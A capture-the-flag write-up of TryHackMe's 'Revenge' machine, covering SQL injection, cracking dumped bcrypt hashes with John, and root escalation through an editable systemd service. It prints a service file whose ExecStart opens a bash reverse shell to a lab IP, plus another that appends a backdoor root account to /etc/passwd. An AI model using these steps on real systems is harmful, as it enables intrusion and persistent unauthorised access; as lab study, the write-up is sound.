THM: Revenge
Introduction
You’ve been hired by Billy Joel to get revenge on Ducky Inc…the company that fired him. Can you break into the server and complete your mission?
This is Revenge from TryHackMe. It’s medium rated.
Cut to the chase
I’m going to skip over a lot of this. Foothold is via a SQLi on the ‘products’ page of the website, sqlmap can dump the database and John can crack the hash for one of the users; then we SSH in.
root@kali:/opt/tryhackme/revenge# cat system_user.csv
id,email,username,_password
1,sadmin@duckyinc.org,server-admin,$2a$08$GPh7KZcK2kNIQEm5byBj1umCQ79xP.zQe19hPoG/w2GoebUtPfT8a
2,kmotley@duckyinc.org,kmotley,$2a$12$LEENY/LWOfyxyCBUlfX8Mu8viV9mGUse97L8x.4L66e9xwzzHfsQa
3,dhughes@duckyinc.org,dhughes,$2a$12$22xS/uDxuIsPqrRcxtVmi.GR2/xh0xITGdHuubRF4Iilg5ENAFlcK
root@kali:/opt/tryhackme/revenge# nano hashes
root@kali:/opt/tryhackme/revenge# john hashes -w=/usr/share/wordlists/rockyou.txt
Loaded 3 password hashes with 3 different salts (bcrypt [Blowfish 32/64 X3])
Loaded hashes with cost 1 (iteration count) varying from 256 to 4096
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
inuyasha (?)After I was done with this I checked some writeups and unfortunately they all used sqlmap, no-one did the SQLi manually. I had a bit of a go at it but I wasn’t getting too far.
For the privesc, our user can edit and restart a service, so that’s our path:
server-admin@duckyinc:~$ sudo -l
[sudo] password for server-admin:
Matching Defaults entries for server-admin on duckyinc:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User server-admin may run the following commands on duckyinc:
(root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit
/etc/systemd/system/duckyinc.serviceThe service runs the webserver. The final flag was supposed to be awarded for defacing the webserver front page, not by gaining root. Anyway, the first time I tried it I sent myself a root shell:
[Unit]
Description=Gunicorn instance to serve DuckyInc Webapp
After=network.target
[Service]
User=root
Group=root
WorkingDirectory=/var/www/duckyinc
ExecStart=/bin/bash -c "/bin/bash -i >& /dev/tcp/10.9.10.123/1234 0>&1"
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s TERM $MAINPID
[Install]
WantedBy=multi-user.targetThen I edited /var/www/duckyinc/templates/index.html … and got a 502 Bad Gateway error on the website.
Next, I used the service to make myself another root user:
[Unit]
Description=Gunicorn instance to serve DuckyInc Webapp
After=network.target
[Service]
Description=Gunicorn instance to serve DuckyInc Webapp
After=network.target
[Service]
User=root
Group=root
WorkingDirectory=/var/www/duckyinc
ExecStart=/bin/bash -c "echo root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash >> /etc/passwd"
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s TERM $MAINPID
[Install]
WantedBy=multi-user.target
server-admin@duckyinc:~$ sudoedit /etc/systemd/system/duckyinc.service
server-admin@duckyinc:~$ sudo -u root /bin/systemctl daemon-reload
server-admin@duckyinc:~$ sudo -u root /bin/systemctl restart duckyinc.service
server-admin@duckyinc:~$ su root2
Password:
root@duckyinc:/home/server-admin#Then I edited /var/www/duckyinc/templates/index.html … and got a 502 Bad Gateway error on the website.
I checked some writeups and no-one else mentioned this as being an issue. Anyway, I then restored the service file to the original state and restarted it again (still with my root2 user) and finally it worked. So yeah, not sure what was up with that.